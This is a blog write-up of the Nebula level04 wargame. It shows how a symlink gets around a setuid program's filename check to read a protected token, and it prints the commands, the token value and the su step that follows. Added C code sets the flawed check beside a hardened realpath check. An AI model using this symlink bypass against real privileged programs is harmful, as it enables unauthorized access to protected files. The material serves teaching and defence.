Wednesday, August 8, 2012

nebula level04

Our objective this time is a bit different. As stated in http://exploit-exercises.com/nebula/level04, instead of directly impersonating flag04, our task is to get a token. The source code for /home/flag04/flag04 is given below.

After analyzing it, we conclude that the program opens the file named by its first argument, reads its contents, and writes them to the standard output (1 is the file descriptor for the standard output, or stdout, also defined as STDOUT_FILENO).
In the /home/flag04 directory we notice that there's a file named token:
level04@nebula:~$ ls -l /home/flag04
total 12
-rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
-rw------- 1 flag04 flag04    37 2011-11-20 21:52 token
Could we use flag04 to print out the contents of token? As it turns out, flag04 will not allow us to dump the contents of files containing "token" in their name.
This challenge requires us to know about symlinks (short for symbolic links). Symlinks are Linux's equivalent of shortcuts: we create one with ln -s, and any program that opens the link is transparently handed the original file, while the link itself can carry whatever name we choose. You can learn more about symlinks on Wikipedia or in ln's man page ("man ln").

Getting the token

Easily enough, we create a symlink to token under a name that does not contain "token", and run flag04 on it.
level04@nebula:~$ ln -s /home/flag04/token t
level04@nebula:~$ /home/flag04/flag04 t
06508b5e-8909-4f38-b630-fdb148a848a2
There's our token. As it turns out, the token is also the password for user flag04.
So let's get that flag :)
level04@nebula:~$ su flag04 -c getflag
Password:
You have successfully executed getflag on a target account
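The post does not reproduce flag04's source, so what follows is an added example written for this write-up, not the Nebula program itself: a reconstruction of the kind of name-only check the level describes, beside a hardened check that canonicalises the path with realpath(3) before looking at the file name, plus a small harness that recreates the symlink trick in a scratch directory. All function names are my own assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Flawed check (assumed shape of flag04's test): it only inspects the name the
 * caller typed, so a symlink "t" -> token never contains "token" and passes. */
int blocked_by_name(const char *path) {
    return strstr(path, "token") != NULL;
}

/* Hardened check: resolve symlinks, "." and ".." first, then look at the final
 * component of the real path. Returns 1 blocked, 0 allowed, -1 unresolvable. */
int blocked_by_resolved_name(const char *path) {
    char real[PATH_MAX];
    if (realpath(path, real) == NULL)
        return -1;
    const char *base = strrchr(real, '/');
    base = base ? base + 1 : real;
    return strstr(base, "token") != NULL;
}

/* Recreates the level04 situation in a scratch directory: a file literally named
 * "token" and a symlink "t" pointing at it. Returns 1 when the name-only check is
 * bypassed through the symlink while the resolved check still blocks it. */
int demo_symlink_bypass(void) {
    char dir[] = "/tmp/nebula04XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 0;
    char token[PATH_MAX], lnk[PATH_MAX];
    snprintf(token, sizeof token, "%s/token", dir);
    snprintf(lnk, sizeof lnk, "%s/t", dir);
    int fd = open(token, O_WRONLY | O_CREAT, 0600);
    int ok = fd >= 0 && close(fd) == 0 && symlink(token, lnk) == 0
          && blocked_by_name(token) == 1
          && blocked_by_name(lnk) == 0             /* the bypass used in the post */
          && blocked_by_resolved_name(lnk) == 1;   /* canonical name is still "token" */
    unlink(lnk); unlink(token); rmdir(dir);        /* clean up the scratch directory */
    return ok;
}

int main(void) {
    printf("symlink bypasses the name check: %s\n", demo_symlink_bypass() ? "yes" : "no");
    return 0;
}
```

Even the realpath variant still trusts a file name; comparing the opened file's st_dev and st_ino (fstat(2)) against the protected file also catches hard links and avoids the check-then-open race.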

~ Dmitry
